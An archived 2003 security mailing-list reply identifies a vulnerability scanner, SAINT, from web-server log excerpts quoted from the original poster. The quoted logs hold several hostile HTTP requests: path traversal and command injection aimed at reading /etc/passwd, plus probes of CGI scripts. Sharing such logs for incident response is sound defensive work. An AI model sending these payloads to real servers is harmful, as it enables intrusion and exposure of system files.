AW: Chinese source: some web attack tool
From: Tobias Lachmann (tobias@lachmann.org)
Date: 03/22/03
- Previous message: Paul: "Chinese source: some web attack tool"
- In reply to: Paul: "Chinese source: some web attack tool"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Tobias Lachmann" <tobias@lachmann.org> To: "'Paul'" <pbobby@stny.rr.com>, <incidents@securityfocus.com> Date: Sat, 22 Mar 2003 22:11:36 +0100
The tool in question was SAINT, the successor of SATAN.. which you can
find at http://www.wwdsi.com/saint/ .
> -----Ursprüngliche Nachricht-----
> Von: Paul [mailto:pbobby@stny.rr.com]
> Gesendet: Freitag, 21. März 2003 23:15
> An: incidents@securityfocus.com
> Betreff: Chinese source: some web attack tool
>
>
>
>
> Getting hammered by a Chinese site, 218.88.98.237.
>
> Anyone else?
>
> They are web attacks, and here is a sample of the various attempts it
> tries to make:
>
> GET
> /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../et
> c/passwd%
> 00 HTTP/1.0
> GET /IISSamples/ExAir/search/query.asp HTTP/1.0
> GET /cgi-bin/sh HTTP/1.0
> GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0
> GET /search.dll?search?query=%00&logic=AND HTTP/1.0
> GET
> /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
> HTTP/1.0
>
> and so forth. Anyone recognize the tool?
>
> --------------------------------------------------------------
> --------------
>
> <Pre>Lose another weekend managing your IDS?
> Take back your personal time.
> 15-day free trial of StillSecure Border Guard.</Pre>
> <A href="http://www.securityfocus.com/stillsecure">
> http://www.securityfocus.com/stillsecure </A>
>
>
----------------------------------------------------------------------------
<Pre>Lose another weekend managing your IDS?
Take back your personal time.
15-day free trial of StillSecure Border Guard.</Pre>
<A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A>
- Previous message: Paul: "Chinese source: some web attack tool"
- In reply to: Paul: "Chinese source: some web attack tool"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
